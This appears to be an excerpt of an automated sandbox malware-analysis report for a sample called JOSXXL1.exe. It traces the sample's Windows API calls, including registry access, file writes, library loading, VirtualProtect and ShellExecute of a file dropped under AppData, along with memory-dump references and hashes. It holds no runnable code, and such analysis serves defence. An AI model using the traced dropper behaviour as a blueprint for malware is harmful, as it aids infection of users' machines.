                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00403203
                                                                                                          • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
                                                                                                        • SetFilePointer.KERNELBASE(00006683,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer$CountTick
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree
                                                                                                        • String ID: Call
                                                                                                        • API String ID: 3394109436-1824292864
                                                                                                        • Opcode ID: f88941aab83e101553d5540b733a17bc25209ec56a178cf788fbb5fa74510e27
                                                                                                        • Instruction ID: b8c0f167556598de95a2943c4b9b6d871f440ab9687b9cc3bbf8d3c3407f6303
                                                                                                        • Opcode Fuzzy Hash: f88941aab83e101553d5540b733a17bc25209ec56a178cf788fbb5fa74510e27
                                                                                                        • Instruction Fuzzy Hash: 76212372A00101EBDB20EFA4CE84E5E77B6AF84324724413BF502B72D1DA78A8219B5D
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseOpenValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 167947723-0
                                                                                                        • Opcode ID: 75e403394dc50a8c7c183b4285cc569fa5c7c3c77eca1b14b9eda447d69f20eb
                                                                                                        • Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
                                                                                                        • Opcode Fuzzy Hash: 75e403394dc50a8c7c183b4285cc569fa5c7c3c77eca1b14b9eda447d69f20eb
                                                                                                        • Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?), ref: 00401E52
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00401E3B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 587946157-3036879226
                                                                                                        • Opcode ID: 158f6bd7a2a94e12e99570158ecabfa588133fd885f5a6516805ca769e2f3cbe
                                                                                                        • Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
                                                                                                        • Opcode Fuzzy Hash: 158f6bd7a2a94e12e99570158ecabfa588133fd885f5a6516805ca769e2f3cbe
                                                                                                        • Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1948546556-0
                                                                                                        • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                        • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                        • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                        • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                        • Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
                                                                                                        • Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                        • Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 6b8680535f0b85fdc843acb4741b92e467c1e624be2e580cfd2f738fb4bf4c11
                                                                                                        • Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
                                                                                                        • Opcode Fuzzy Hash: 6b8680535f0b85fdc843acb4741b92e467c1e624be2e580cfd2f738fb4bf4c11
                                                                                                        • Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19
                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                        • Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
                                                                                                        • Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                        • Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 849931509-0
                                                                                                        • Opcode ID: c59139a464c15aa085cb21755151ec7ff0657f277cb3fbf5c983bdbea560d0af
                                                                                                        • Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
                                                                                                        • Opcode Fuzzy Hash: c59139a464c15aa085cb21755151ec7ff0657f277cb3fbf5c983bdbea560d0af
                                                                                                        • Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                          • Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                          • Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
                                                                                                          • Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547128583-0
                                                                                                        • Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                        • Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
                                                                                                        • Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                        • Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D
                                                                                                        APIs
                                                                                                        • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$EnableShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1136574915-0
                                                                                                        • Opcode ID: 9fe90b50c1299fe4fda6fea10b77ea4039d57455645490fd416540ed0fe32fde
                                                                                                        • Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
                                                                                                        • Opcode Fuzzy Hash: 9fe90b50c1299fe4fda6fea10b77ea4039d57455645490fd416540ed0fe32fde
                                                                                                        • Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                        • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                        • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                        • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                        • Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
                                                                                                        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                        • Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
                                                                                                        • GetLastError.KERNEL32 ref: 00405842
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1375471231-0
                                                                                                        • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                        • Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
                                                                                                        • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                        • Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00412514,0040CEF0,004032EF,0040CEF0,00412514,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                        • Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
                                                                                                        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                        • Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID:
                                                                                                        • API String ID: 71445658-0
                                                                                                        • Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                        • Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
                                                                                                        • Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                        • Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                        • Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
                                                                                                        • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                        • Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                        • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                        • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                        APIs
                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: c4528ff674870a17743e7c966ff3c37f2ecf4e92b6133aa71faff386c44fe70c
                                                                                                        • Instruction ID: ca47bcbc6672940417f4f3661b4a0bb48d49598efcfee23ab0cca25c35b9ec2b
                                                                                                        • Opcode Fuzzy Hash: c4528ff674870a17743e7c966ff3c37f2ecf4e92b6133aa71faff386c44fe70c
                                                                                                        • Instruction Fuzzy Hash: 00D05B33704100D7CB10DFE89F0869D77759B40334B208177D501F21E4D6B9C5519B1D
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                        • Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
                                                                                                        • Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                        • Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                        • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                        • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                        • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                        • Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
                                                                                                        • Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                        • Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19
                                                                                                        APIs
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2492992576-0
                                                                                                        • Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                        • Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
                                                                                                        • Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
